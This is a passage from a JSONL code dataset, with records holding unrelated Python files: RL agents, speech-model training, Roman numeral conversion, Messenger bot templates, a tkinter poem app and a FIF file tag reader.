io.open(CONFIG_FILE, 'w', encoding='utf8') as outfile:\n yaml.dump(config, outfile, default_flow_style=False, allow_unicode=True)\n\n @staticmethod\n def get_relays_raw():\n relays_raw = []\n for relay in Relays.get_relays():\n relays_raw.append(relay.to_dict())\n return relays_raw\n\n @staticmethod\n def set_status(status):\n for relay in Relays.get_relays():\n relay.set_status(status)\n\n @staticmethod\n def on():\n Relays.set_status(True)\n\n @staticmethod\n def off():\n Relays.set_status(False)\n\n @staticmethod\n def toggle():\n for relay in Relays.get_relays():\n relay.set_status(not relay.get_status())\n\n\n\n\n\n# Init\nRelays.read_config()\n","sub_path":"app/relays.py","file_name":"relays.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"229783739","text":"import numpy as np\n\nfrom torch_rl.action_blocker.action_blocker import ActionBlocker\nfrom torch_rl.replay.replay import ReplayBuffer\n\n\nclass HillClimbingAgent:\n def __init__(self, input_dims, action_space, gamma, noise_scale=1e-2, enable_action_blocking=False, min_penalty=0,\n action_blocker_memory=None, action_blocker_model_name=None,\n action_blocker_timesteps=1000000, action_blocker_model_type=None):\n\n self.num_actions = action_space.n\n\n self.flatten_state = len(input_dims) > 1\n self.total_fc_input_dims = 1\n for dim in input_dims:\n self.total_fc_input_dims *= dim\n self.w = 1e-4 * np.random.rand(self.total_fc_input_dims, self.num_actions)\n\n self.enable_action_blocking = enable_action_blocking\n self.initial_action_blocked = False\n self.initial_action = None\n if self.enable_action_blocking:\n if action_blocker_memory is None:\n action_blocker_memory = ReplayBuffer(input_shape=input_dims, max_size=action_blocker_timesteps)\n else:\n action_blocker_memory.add_more_memory(extra_mem_size=action_blocker_timesteps)\n self.action_blocker = ActionBlocker(action_space, penalty=min_penalty, 
memory=action_blocker_memory,\n model_name=action_blocker_model_name,\n model_type=action_blocker_model_type)\n\n self.gamma = gamma\n self.noise_scale = noise_scale\n\n self.best_R = -np.inf\n self.best_w = self.w\n\n self.rewards = []\n\n def store_transition(self, state, action, reward, state_, done):\n self.rewards.append(reward)\n if type(self.action_blocker) == ActionBlocker:\n self.action_blocker.store_transition(state, action, reward, state_, done)\n\n def learn(self):\n discounts = [self.gamma ** i for i in range(len(self.rewards) + 1)]\n R = sum([a * b for a, b in zip(discounts, self.rewards)])\n\n if R >= self.best_R: # found better weights\n self.best_R = R\n self.best_w = self.w\n self.noise_scale = max(1e-3, self.noise_scale / 2)\n self.w += self.noise_scale * np.random.rand(*self.w.shape)\n else: # did not find better weights\n self.noise_scale = min(2.0, self.noise_scale * 2)\n self.w = self.best_w + self.noise_scale * np.random.rand(*self.w.shape)\n\n self.rewards = []\n if type(self.action_blocker) == ActionBlocker:\n self.action_blocker.optimize()\n\n def choose_action(self, env, learning_type, observation, train=True):\n self.initial_action = self.choose_policy_action(observation, train)\n if self.enable_action_blocking:\n self.action_blocker.assign_learning_type(learning_type)\n actual_action = self.action_blocker.find_safe_action(env, observation, self.initial_action)\n self.initial_action_blocked = (actual_action is None or actual_action != self.initial_action)\n if actual_action is None:\n print('WARNING: No valid policy action found, running original action')\n return self.initial_action if actual_action is None else actual_action\n else:\n return self.initial_action\n\n def choose_policy_action(self, observation, train=True):\n if self.flatten_state:\n observation = observation.flatten()\n\n x = np.dot(observation, self.w)\n probs = np.exp(x)/sum(np.exp(x))\n\n if train:\n return np.random.choice(self.num_actions, p=probs)\n else:\n return 
np.argmax(probs)","sub_path":"torch_rl/hill_climbing/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"105462809","text":"\n\nfrom xai.brain.wordbase.nouns._grief import _GRIEF\n\n#calss header\nclass _GRIEFS(_GRIEF, ):\n\tdef __init__(self,): \n\t\t_GRIEF.__init__(self)\n\t\tself.name = \"GRIEFS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"grief\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_griefs.py","file_name":"_griefs.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"84006127","text":"#/usr/env/bin pythoin3\n\nimport pika\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\"localhost\"))\nchannel = connection.channel()\nchannel.queue_declare(queue=\"hello\")\n\nchannel.basic_publish(exchange='',\n routing_key = 'hello',\n body = \"hello world!\")\nprint(\"[x] Sent 'hello wolrd'\")\n\nconnection.close()\n","sub_path":"rabbitmq-example-named/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"651323481","text":"import numpy as np\nimport os, sys\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom model import *\nimport time\nfrom collections import defaultdict\nfrom utils import *\n\n## Locations\nFALCON_DIR = os.environ.get('FALCON_DIR')\nBASE_DIR = os.environ.get('base_dir')\nDATA_DIR = os.environ.get('data_dir')\nEXP_DIR = os.environ.get('exp_dir')\nassert ( all (['FALCON_DIR', 'BASE_DIR', 'DATA_DIR', 'EXP_DIR']) is not None)\n\nETC_DIR = BASE_DIR + '/etc'\n\nsys.path.append(FALCON_DIR)\nfrom src.nn import logger as l\n\n## Flags and variables - This is not the best way 
to code log file since we want log file to get appended when reloading model\nexp_name = 'exp_baseline'\nexp_dir = EXP_DIR + '/' + exp_name\nif not os.path.exists(exp_dir):\n os.mkdir(exp_dir)\n os.mkdir(exp_dir + '/logs')\n os.mkdir(exp_dir + '/models')\n# This is just a command line utility\nlogfile_name = exp_dir + '/logs/log_' + exp_name\ng = open(logfile_name, 'w')\ng.close()\n# This is for visualization\nlogger = l.Logger(exp_dir + '/logs/' + exp_name)\nmodel_name = exp_dir + '/models/model_' + exp_name + '_'\nmax_timesteps = 100\nmax_epochs = 10\nupdates = 0\nlog_flag = 1\nwrite_intermediate_flag = 0\nphones_dict = defaultdict(lambda: len(phones_dict))\nphones_dict[0]\nprint_flag = 0\n\nclass text2speech_am_dataset(Dataset):\n \n def __init__(self, tdd_file = ETC_DIR + '/tdd.train', feats_dir='../feats/rms-arctic_5msec'):\n\n self.tdd_file = tdd_file\n self.feats_dir = feats_dir\n self.phones_array = []\n self.feats_array = [] \n f = open(self.tdd_file)\n for line in f:\n line = line.split('\\n')[0]\n fname = line.split()[0]\n feats_fname = feats_dir + '/' + fname + '.ccoeffs_ascii'\n feats = np.loadtxt(feats_fname)\n self.feats_array.append(feats)\n phones = [ phones_dict[k] for k in line.split()[1:]]\n self.phones_array.append(np.array(phones))\n\n def __getitem__(self, index):\n return self.feats_array[index], self.phones_array[index]\n\n def __len__(self):\n return len(self.phones_array)\n\ndef collate_fn_padding(batch):\n feats_lengths = [len(x[0]) for x in batch]\n phones_lengths = [len(x[1]) for x in batch]\n max_feats_len = np.max(feats_lengths)\n max_phones_len = np.max(phones_lengths)\n \n \n a = np.array( [ _pad_ccoeffs(x[0], max_feats_len) for x in batch ], dtype=np.float)\n b = np.array( [ _pad(x[1], max_phones_len) for x in batch ], dtype=np.int)\n a_batch = torch.FloatTensor(a)\n b_batch = torch.LongTensor(b)\n\n return a_batch, b_batch\n\ndef _pad(seq, max_len):\n if seq.shape[0] < max_len:\n return np.pad(seq, (0, max_len - len(seq)),\n 
mode='constant', constant_values=0)\n else:\n mid_point = int(seq.shape[0]/2.0)\n seq = seq[mid_point - int(max_len/2): mid_point - int(max_len/2) + max_len]\n return seq\n #return seq[mid_point - int(max_len/2): mid_point + int(max_len/2)] \n\n\ndef _pad_ccoeffs(seq, max_len):\n\n if seq.shape[0] < max_len:\n kk = np.zeros((max_len-seq.shape[0], seq.shape[1]), dtype='float32')\n return np.concatenate((seq,kk),axis = 0)\n \n else:\n mid_point = int(seq.shape[0]/2.0)\n return seq[mid_point - int(max_len/2): mid_point - int(max_len/2) + max_len] \n\n\n\ntdd_file = ETC_DIR + '/tdd.phseq.train'\nfeats_dir = BASE_DIR + '/feats/rms_arctic_5msec'\ntrain_set = text2speech_am_dataset(tdd_file, feats_dir)\ntrain_loader = DataLoader(train_set,\n batch_size=16,\n shuffle=True,\n num_workers=4,\n collate_fn=collate_fn_padding\n )\n\ntdd_file = ETC_DIR + '/tdd.phseq.test'\nval_set = text2speech_am_dataset(tdd_file, feats_dir)\nval_loader = DataLoader(val_set,\n batch_size=4,\n shuffle=True,\n num_workers=4,\n collate_fn=collate_fn_padding\n )\n\n#for i, (feats, phones) in enumerate(train_loader):\n# print(i, feats.shape, phones.shape)\n\n## Model\nmodel = attentionlstm(len(phones_dict))\nprint(model)\nif torch.cuda.is_available():\n model.cuda()\ncriterion = nn.MSELoss()\noptimizer_adam = torch.optim.Adam(model.parameters(), lr=0.001)\noptimizer_sgd = torch.optim.SGD(model.parameters(), lr=0.001)\noptimizer = optimizer_adam\nupdates = 0\n\n\n\ndef val():\n model.eval()\n l = 0\n with torch.no_grad(): \n for i, (ccoeffs,phones) in enumerate(val_loader):\n\n ccoeffs = torch.FloatTensor(ccoeffs)\n phones = torch.LongTensor(phones)\n ccoeffs, phones = Variable(ccoeffs), Variable(phones)\n if torch.cuda.is_available():\n ccoeffs = ccoeffs.cuda()\n phones = phones.cuda()\n\n ccoeffs_predicted = model(phones, ccoeffs)\n optimizer.zero_grad()\n loss = criterion(ccoeffs_predicted, ccoeffs)\n l += loss.item()\n \n if log_flag:\n logger.scalar_summary('Val Loss', l * 1.0 / (i+1) , updates) 
\n \n return l/(i+1)\n\ndef train():\n model.train()\n optimizer.zero_grad()\n start_time = time.time()\n l = 0\n global updates\n for i, (ccoeffs,phones) in enumerate(train_loader):\n updates += 1\n\n ccoeffs = torch.FloatTensor(ccoeffs)\n phones = torch.LongTensor(phones)\n ccoeffs, phones = Variable(ccoeffs), Variable(phones)\n if torch.cuda.is_available():\n ccoeffs = ccoeffs.cuda()\n phones = phones.cuda()\n\n ccoeffs_predicted = model(phones, ccoeffs)\n if print_flag:\n print(\"Shape of ccoeffs and ccoeffs_predicted: \", ccoeffs.shape, ccoeffs_predicted.shape)\n optimizer.zero_grad()\n loss = criterion(ccoeffs_predicted, ccoeffs)\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), 0.25)\n optimizer.step()\n l += loss.item()\n \n if i % 10 == 1:\n print(\" Train Loss after processing \", updates, \" batches: \", l/(i+1))\n \n if log_flag:\n logger.scalar_summary('Train Loss', l * 1.0 / (i+1) , updates) \n \n return l/(i+1)\n\n\nfor epoch in range(max_epochs):\n epoch_start_time = time.time()\n train_loss = train()\n val_loss = val()\n g = open(logfile_name,'a')\n g.write(\"Train loss after epoch \" + str(epoch) + ' ' + str(train_loss) + \" and the val loss: \" + str(val_loss) + ' It took ' + str(time.time() - epoch_start_time) + '\\n')\n g.close()\n \n if epoch % 10 == 1:\n fname = model_name + '_epoch_' + str(epoch).zfill(3) + '.pth'\n with open(fname, 'wb') as f:\n torch.save(model, f)","sub_path":"tasks/speech/text2speech/baseline/local/acoustic_modeling/attention_am.py","file_name":"attention_am.py","file_ext":"py","file_size_in_byte":6613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"275828761","text":"\"\"\"1. 
아래와 같이 숫자를 두번 물어보게 하고 ★을 출력해서 사각형을 만드시오\n가로의 숫자를 입력하시오 : \n세로의 숫자를 입력하시오 : \"\"\"\n\ntry:\n num_x = int(input(\"가로의 숫자를 입력하시오 : \"))\n num_y = int(input(\"세로의 숫자를 입력하시오 : \"))\n for y in range(num_y):\n for x in range(num_x):\n print(\"★\", end=\" \")\n print()\nexcept ValueError:\n print(\"No.. input is not a number.\")","sub_path":"한누리/01_quiz/python_01.py","file_name":"python_01.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"592022200","text":"from tkinter import *\nfrom tkinter import messagebox\nimport re\nimport os\nimport glob\n\nclass Application:\n root = 0\n btns = []\n\n def __init__(self, parent):\n self.root = parent\n parent.title('Poems application')\n parent.geometry('%dx%d+%d+%d' % (360, 100, 0, 0))\n parent.resizable(0, 0)\n\n url = os.getcwd() + '\\\\icon.ico'\n parent.iconbitmap(url)\n\n self.menu()\n\n # -------------------------------- Pages --------------------------------\n\n def menu(self):\n self.root.title(\"Menu\")\n\n self.menu_lbl = Label(self.root, text=\"Menu:\", font=\"helvetica 15\")\n self.menu_lbl.grid(row=0, padx=20, sticky='W')\n\n poem_name = self.poem_names()\n\n self.geometry_controll(380, len(poem_name)) # Добавление пространства эквивалентно количеству пунктов меню\n\n for i in range(len(poem_name)):\n b = Button(self.root, text=poem_name[i], command=lambda j=i: self.choice_poem(j),\n borderwidth=2, relief=\"groove\")\n b.grid(row=i, column=1, padx=10, pady=10, sticky='W')\n self.btns.append(b)\n\n self.add_poem_btm = Button(self.root, text=\"Add poem\", command=self.add_poem_cmd,\n borderwidth=2, relief=\"groove\")\n self.add_poem_btm.grid(row=1, padx=15, sticky='W')\n\n self.remove_poem_btn = Button(self.root, text=\"Remove poem\", command=self.remove_btn,\n borderwidth=2, relief=\"groove\")\n self.remove_poem_btn.grid(row=2, padx=15, sticky='W')\n\n def page(self, index):\n names = self.poem_names()\n\n 
self.root.title(names[index])\n\n self.page_lbl = Label(self.root, text=names[index], font=\"helvetica 15\")\n self.page_lbl.pack()\n\n text = self.poem_text(index + 1)\n\n self.geometry_controll(500, self.count_lines(text) / 2)\n\n self.page_text = Label(self.root, text=text, font=\"helvetica 11\")\n self.page_text.pack()\n\n\n self.page_button = Button(self.root, text=\"Back to menu <<<\", command=self.page_btn_cmd,\n borderwidth=2, relief=\"groove\")\n self.page_button.pack(side=BOTTOM, pady=15)\n\n def add_poem(self):\n self.root.title(\"Add poem\")\n\n self.add_lbl = Label(self.root, text=\"Add poem\", font=\"helvetica 15\")\n self.add_lbl.grid(row=0, padx=10, pady=10)\n\n self.add_lbl_name = Label(self.root, text=\"Poem name\", font=\"helvetica 10\")\n self.add_lbl_name.grid(row=1, pady=10, padx=10, sticky='NW')\n\n self.add_entry = Entry(self.root, width=67, borderwidth=2, relief=\"groove\")\n self.add_entry.grid(row=1, column=1, sticky='W')\n\n self.add_lbl_text = Label(self.root, text=\"Poem text\", font=\"helvetica 10\")\n self.add_lbl_text.grid(row=2, padx=10, pady=10, sticky='NW')\n\n self.add_scroll = Scrollbar(self.root)\n self.add_text = Text(self.root, height=16, width=50, borderwidth=2, relief=\"groove\")\n self.add_text.grid(row=2, column=1, pady=10, sticky='W')\n self.add_scroll.grid(row=2, column=1, sticky='E')\n self.add_scroll.config(command=self.add_text.yview)\n self.add_text.config(yscrollcommand=self.add_scroll.set)\n\n self.add_btm = Button(self.root, text=\"Add poem\", command=self.add_btm_cmd, borderwidth=2, relief=\"groove\")\n self.add_btm.grid(row=3, column=1, pady=10, sticky='E')\n\n self.add_btm_back = Button(self.root, text=\"Back to menu\", command=self.add_back_cmd,\n borderwidth=2, relief=\"groove\")\n self.add_btm_back.grid(row=4, column=1, pady=10, sticky='E')\n\n self.root.geometry(\"540x470\")\n\n def remove_poem(self):\n self.root.title(\"Remove poem\")\n\n self.remove_frame = Frame(self.root)\n 
self.remove_frame.grid()\n\n self.del_main_lbl = Label(self.remove_frame, text=\"Remove:\", font=\"helvetica 15\")\n self.del_main_lbl.grid(row=0, pady=10, padx=10, sticky='W')\n\n text = 'Select which poem \\nyou want to delete:'\n\n del_lbl_info = Label(self.remove_frame, text=text)\n del_lbl_info.grid(row=1, padx=10)\n\n del_back_btn = Button(self.remove_frame, text=\"Back to menu\", borderwidth=2, relief=\"groove\",\n command=self.del_back_cmd)\n del_back_btn.grid(row=2, padx=10, sticky='W')\n\n poem_name = self.poem_names()\n\n self.geometry_controll(400, len(poem_name)) # Добавление пространства эквивалентно количеству пунктов меню\n\n for i in range(len(poem_name)):\n b = Button(self.remove_frame, text=poem_name[i], command=lambda j=i: self.del_poem_cmd(j),\n borderwidth=2, relief=\"groove\")\n b.grid(row=i, column=1, padx=10, pady=10, sticky='W')\n self.btns.append(b)\n\n # -------------------------------- Help functions --------------------------------\n\n def geometry_controll(self, x, y):\n space = y * 35 + 100\n self.root.geometry('%dx%d' % (x, space))\n pass\n\n def count_lines(self, str):\n lines = re.findall('\\n', str)\n count = 0\n for _ in lines:\n count += 1\n return count\n\n def count_poems(self):\n counter = 0\n way = os.getcwd() + '\\\\poems\\\\*'\n url = glob.glob(way)\n for i in url:\n counter += 1\n return counter\n\n def poem_names(self):\n result = []\n way = os.getcwd() + '\\\\poems\\\\'\n url = glob.glob(way+'\\\\*')\n for i in url:\n f = open(i, 'r')\n str = f.read()\n find = re.findall(r'(?<=)(.*)(?=)', str)\n result.append(find[0])\n f.close()\n return result\n\n def poem_text(self, index):\n way = os.getcwd() + '\\\\poems\\\\'\n url = glob.glob(way+'poem_%d.txt' % index)\n f = open(url[0], 'r')\n str = f.read()\n find = re.findall(r'(.*)', str, flags=re.DOTALL)\n result = find[0]\n f.close()\n return result\n\n # -------------------------------- Help for commands --------------------------------\n\n def remove_menu_w(self):\n 
self.menu_lbl.grid_forget()\n for i in range(len(self.btns)):\n self.btns[i].grid_forget()\n self.add_poem_btm.grid_forget()\n self.remove_poem_btn.grid_forget()\n\n def remove_page_w(self):\n self.page_text.pack_forget()\n self.page_lbl.pack_forget()\n self.page_button.pack_forget()\n\n def remove_add_w(self):\n self.add_entry.grid_forget()\n self.add_text.grid_forget()\n self.add_lbl_text.grid_forget()\n self.add_btm.grid_forget()\n self.add_scroll.grid_forget()\n self.add_lbl_name.grid_forget()\n self.add_lbl.grid_forget()\n self.add_btm_back.grid_forget()\n\n # -------------------------------- Button commands --------------------------------\n\n def choice_poem(self, index):\n self.remove_menu_w()\n self.page(index)\n\n def page_btn_cmd(self):\n self.remove_page_w()\n self.menu()\n\n def add_poem_cmd(self):\n self.remove_menu_w()\n self.add_poem()\n\n def add_btm_cmd(self):\n name = self.add_entry.get()\n text = self.add_text.get(\"1.0\", END)\n empty = re.match('^[A-Za-z0-9_-]*', text)\n if name == \"\" or empty.group() == \"\":\n messagebox.showinfo(\"Error!\", \"Enter title of poem and text poem!\") # Момент под вопросом, так как\n else: # поиск выдает результат построчно\n count = self.count_poems() # и получаются несколько лишних \"\"\n file_name = 'poems\\\\poem_' + str(count + 1) + '.txt'\n\n result = \"\" + str(name) + \"\" + \"\\n\\n\"\n result += \"\" + text + \"\"\n\n f = open(file_name, 'w')\n f.write(result)\n f.close()\n\n self.remove_add_w()\n\n self.menu()\n\n def add_back_cmd(self):\n self.remove_add_w()\n self.menu()\n\n def remove_btn(self):\n self.remove_menu_w()\n self.remove_poem()\n\n def del_poem_cmd(self, i):\n self.remove_frame.grid_forget()\n self.menu()\n\n def del_back_cmd(self):\n self.remove_frame.grid_forget()\n self.menu()\n\n# -------------------------------- End of class --------------------------------\n\ndef main():\n root = Tk()\n Application(root)\n root.mainloop()\n\nif __name__ == '__main__':\n 
main()","sub_path":"project14_poem_application_v_1_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"469869181","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nOpen the Consumer Price Index (CPI) dataset.\n\"\"\"\nimport os\nimport csv\n\n\ndef _get_cpi_dict():\n \"\"\"\n Returns a dictionary of the CPI-U adjustment value for each year available.\n \"\"\"\n # Open up the CSV from the BLS\n this_dir = os.path.dirname(__file__)\n csv_path = os.path.join(this_dir, 'data.csv')\n csv_file = open(csv_path, \"r\")\n csv_data = csv.DictReader(csv_file)\n\n # Convert it into a dictionary and pass it out.\n return dict(\n (int(r['year']), float(r['value'])) for r in csv_data\n )\n\n\ncpi_by_year = _get_cpi_dict()\n","sub_path":"cpi/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"606881337","text":"class Solution:\n def romanToInt(self, s: str) -> int:\n \n import time\n\n dict = {'I':1,'V':5,'X':10,'L':50,'C':100,'D':500,'M':1000}\n t0 = time.time()\n numbers = [dict[i] for i in s]\n t1 = time.time()\n print(f\"map to values takes {t1-t0} secs\")\n #ind = [x-y for x,y in zip(numbers[:-1],numbers[1:])]\n ind = [-1 if numbers[i+1] - numbers[i] < 0 else 1 for i in range(len(s)-1)] +[1]\n t2 = time.time()\n print(f\"check increment/decrement takes {t2-t1} secs\")\n #ind = [-1 if i < 0 else 1 for i in ind] + [1]\n t3 = time.time()\n print(f\"convert change to digital takes {t3-t2} secs\")\n summation = [i*j for i,j in zip(numbers, ind)]\n t4 = time.time()\n print(f\"zip takes {t4-t3} secs\")\n return sum(summation)\n\n\nif __name__ == '__main__':\n sol = Solution()\n #strings = ['IV','III','IX','MCMXCIV']\n strings = ['MCMXCIV']\n for s in strings:\n print(sol.romanToInt(s))\n 
\n","sub_path":"roman_to_integer.py","file_name":"roman_to_integer.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345752065","text":"\"\"\"\nDavid Rubio Vallejo\n\nImplements an RNN with an embedding layer consisting of the word vectors for the input words, the recurrent RNN layer,\n and an output layer mapping into a single neuron.\n\nAn RNN model in Gluon is represented as a triple (S, N, W), where\nS = Length of the sequence\nN = Batch size\nW = Length of each word-vector for a token in a sentence.\n\"\"\"\n\nimport mxnet.gluon as gluon\nfrom mxnet.gluon import HybridBlock\nfrom mxnet.ndarray import squeeze, swapaxes\n\n\nclass RNNTextClassifier(HybridBlock):\n\n def __init__(self, emb_input_dim, emb_output_dim, num_classes=1, prefix=None, params=None):\n super(RNNTextClassifier, self).__init__(prefix=prefix, params=params)\n\n with self.name_scope():\n\n self.embedding = gluon.nn.Embedding(emb_input_dim, emb_output_dim)\n\n self.rnn = gluon.rnn.RNN(hidden_size=100)\n self.activation1 = gluon.nn.Dropout(0.2)\n self.out = gluon.nn.Dense(num_classes)\n\n def hybrid_forward(self, F, data):\n # data.shape is a triple of (16, 1, 64). 
Need to eliminate that redundant second dimension and transpose it\n # before attaching the embeddings\n data = squeeze(data)\n data = data.T\n embedded = self.embedding(data)\n\n x = self.rnn(embedded)\n x - self.activation1(x)\n\n # Swap the first and second axes to bring it from (length, batch size, width) to (batch size, length, width),\n # before passing it to the outer layer (only recurrent layers use the first ordering).\n x = swapaxes(x, 0, 1)\n\n x = self.out(x)\n\n return x","sub_path":"RNN_model.py","file_name":"RNN_model.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"433433441","text":"# import json\ndef GenericTemplate(template_items:list):\n message_str = {\n \"attachment\": {\n \"type\": \"template\",\n \"payload\": {\n \"template_type\": \"generic\",\n \"elements\": template_items\n\n }\n }\n }\n return message_str\ndef ButtonPostbackTemplate(btn_tittle:str,btn_payload:str):\n button = {\n \"type\":\"postback\",\n \"title\":btn_tittle,\n \"payload\":btn_payload\n }\n return button\ndef ItemsTemplate(title:str,url_img:str,subtitle:str,list_button:list):\n template_item = {\n \"title\": title,\n \"image_url\": url_img,\n \"subtitle\": subtitle,\n \"default_action\": {\n \"type\": \"web_url\",\n \"url\": url_img,\n \"webview_height_ratio\": \"full\"\n },\n \"buttons\": list_button\n }\n\n return template_item\n\ndef HardwareAnswer(name:str,TypeQ:str,answer:str):\n template = {'YorN':{\"yes\":\"Máy có {} ạ.\".format(name),\"no\":\"Sản phẩm không có {} ạ\".format(name)},\n 'WHQ':{\"yes\":\"Máy sử dụng {} ạ.\".format(name),\"no\":\"Sản phẩm không có {} ạ\".format(name)}}\n result = template[TypeQ][answer]\n return result\n\ndef PersistentMenu(list_button:list):\n message_str = {\"persistent_menu\": [\n {\n \"locale\": \"default\",\n \"composer_input_disabled\": \"false\",\n \"call_to_actions\": list_button\n }\n ]}\n return message_str\n\ndef 
QuickReply(temp:str,danhsach:str):\n data = {'action_product_configuration':'Cấu hình','action_promotions_and_gift':'Khuyến mãi','action_guarantee':'Bảo hành','action_option_in_box':'Phụ kiện trong hộp','action_is_product_can_buy_on_installment':'Trả góp được không','action_take_photo_erase_background':'Chụp ảnh xóa phông','action_waterproof':'Có chống nước không'}\n listitem = []\n data.pop(temp)\n for item in data:\n btn = {\"content_type\": \"text\",\n \"title\": data.__getitem__(item),\n \"payload\": data.__getitem__(item)}\n listitem.append(btn)\n if danhsach:\n tmp = {\"content_type\": \"text\",\n \"title\": \"Quay lại danh sách\",\n \"payload\": danhsach}\n listitem.append(tmp)\n message = {\n \"text\": \"Thông tin khác\",\n \"quick_replies\": listitem}\n return message\n\ndef BackToList(temp:str):\n message = {\"text\": \"Thông tin khác\",\n \"quick_replies\":[{\"content_type\": \"text\",\n \"title\": \"Quay lại danh sách\",\n \"payload\": temp}]\n }\n return message\ndef UrlButton(url:str):\n message_str = {\n \"type\": \"web_url\",\n \"url\": url,\n \"title\": \"Trả góp\",\n \"webview_height_ratio\": \"full\"\n }\n return message_str","sub_path":"CreateJsonMessageTemplate.py","file_name":"CreateJsonMessageTemplate.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403087638","text":"# Authors: Alexandre Gramfort \n# Matti Hamalainen \n#\n# License: BSD (3-clause)\n\nimport struct\nimport numpy as np\n\nfrom .bunch import Bunch\nfrom .constants import FIFF\n\n\nclass Tag(object):\n \"\"\"Tag in FIF tree structure\n\n Parameters\n ----------\n kind: int\n Kind of Tag\n\n type_: int\n Type of Tag\n\n size: int\n Size in bytes\n\n int: next\n Position of next Tag\n\n pos: int\n Position of Tag is the original file.\n\n \"\"\"\n\n def __init__(self, kind, type_, size, next, pos=None):\n self.kind = int(kind)\n self.type = int(type_)\n self.size = int(size)\n 
self.next = int(next)\n self.pos = pos if pos is not None else next\n self.pos = int(self.pos)\n self.data = None\n\n def __repr__(self):\n out = \"kind: %s - type: %s - size: %s - next: %s - pos: %s\" % (\n self.kind, self.type, self.size, self.next, self.pos)\n if hasattr(self, 'data'):\n out += \" - data: %s\" % self.data\n out += \"\\n\"\n return out\n\n def __cmp__(self, tag):\n is_equal = (self.kind == tag.kind and\n self.type == tag.type and\n self.size == tag.size and\n self.next == tag.next and\n self.pos == tag.pos and\n self.data == tag.data)\n if is_equal:\n return 0\n else:\n return 1\n\n\ndef read_tag_info(fid):\n \"\"\"Read Tag info (or header)\n \"\"\"\n s = fid.read(4 * 4)\n tag = Tag(*struct.unpack(\">iiii\", s))\n if tag.next == 0:\n fid.seek(tag.size, 1)\n elif tag.next > 0:\n fid.seek(tag.next, 0)\n return tag\n\n\ndef read_tag(fid, pos=None):\n \"\"\"Read a Tag from a file at a given position\n\n Parameters\n ----------\n fid: file\n The open FIF file descriptor\n\n pos: int\n The position of the Tag in the file.\n\n Returns\n -------\n tag: Tag\n The Tag read\n \"\"\"\n if pos is not None:\n fid.seek(pos, 0)\n\n s = fid.read(4 * 4)\n tag = Tag(*struct.unpack(\">iIii\", s))\n\n #\n # The magic hexadecimal values\n #\n is_matrix = 4294901760 # ffff0000\n matrix_coding_dense = 16384 # 4000\n matrix_coding_CCS = 16400 # 4010\n matrix_coding_RCS = 16416 # 4020\n data_type = 65535 # ffff\n #\n if tag.size > 0:\n matrix_coding = is_matrix & tag.type\n if matrix_coding != 0:\n matrix_coding = matrix_coding >> 16\n\n # Matrices\n if matrix_coding == matrix_coding_dense:\n # Find dimensions and return to the beginning of tag data\n pos = fid.tell()\n fid.seek(tag.size - 4, 1)\n ndim = np.fromfile(fid, dtype='>i', count=1)\n fid.seek(-(ndim + 1) * 4, 1)\n dims = np.fromfile(fid, dtype='>i', count=ndim)[::-1]\n #\n # Back to where the data start\n #\n fid.seek(pos, 0)\n\n if ndim != 2:\n raise ValueError('Only two-dimensional matrices are '\n 'supported 
at this time')\n\n matrix_type = data_type & tag.type\n\n if matrix_type == FIFF.FIFFT_INT:\n tag.data = np.fromfile(fid, dtype='>i',\n count=dims.prod()).reshape(dims)\n elif matrix_type == FIFF.FIFFT_JULIAN:\n tag.data = np.fromfile(fid, dtype='>i',\n count=dims.prod()).reshape(dims)\n elif matrix_type == FIFF.FIFFT_FLOAT:\n tag.data = np.fromfile(fid, dtype='>f4',\n count=dims.prod()).reshape(dims)\n elif matrix_type == FIFF.FIFFT_DOUBLE:\n tag.data = np.fromfile(fid, dtype='>f8',\n count=dims.prod()).reshape(dims)\n elif matrix_type == FIFF.FIFFT_COMPLEX_FLOAT:\n data = np.fromfile(fid, dtype='>f4', count=2 * dims.prod())\n # Note: we need the non-conjugate transpose here\n tag.data = (data[::2] + 1j * data[1::2]).reshape(dims)\n elif matrix_type == FIFF.FIFFT_COMPLEX_DOUBLE:\n data = np.fromfile(fid, dtype='>f8', count=2 * dims.prod())\n # Note: we need the non-conjugate transpose here\n tag.data = (data[::2] + 1j * data[1::2]).reshape(dims)\n else:\n raise ValueError('Cannot handle matrix of type %d yet' %\n matrix_type)\n\n elif matrix_coding == matrix_coding_CCS or \\\n matrix_coding == matrix_coding_RCS:\n from scipy import sparse\n # Find dimensions and return to the beginning of tag data\n pos = fid.tell()\n fid.seek(tag.size - 4, 1)\n ndim = int(np.fromfile(fid, dtype='>i', count=1))\n fid.seek(-(ndim + 2) * 4, 1)\n dims = 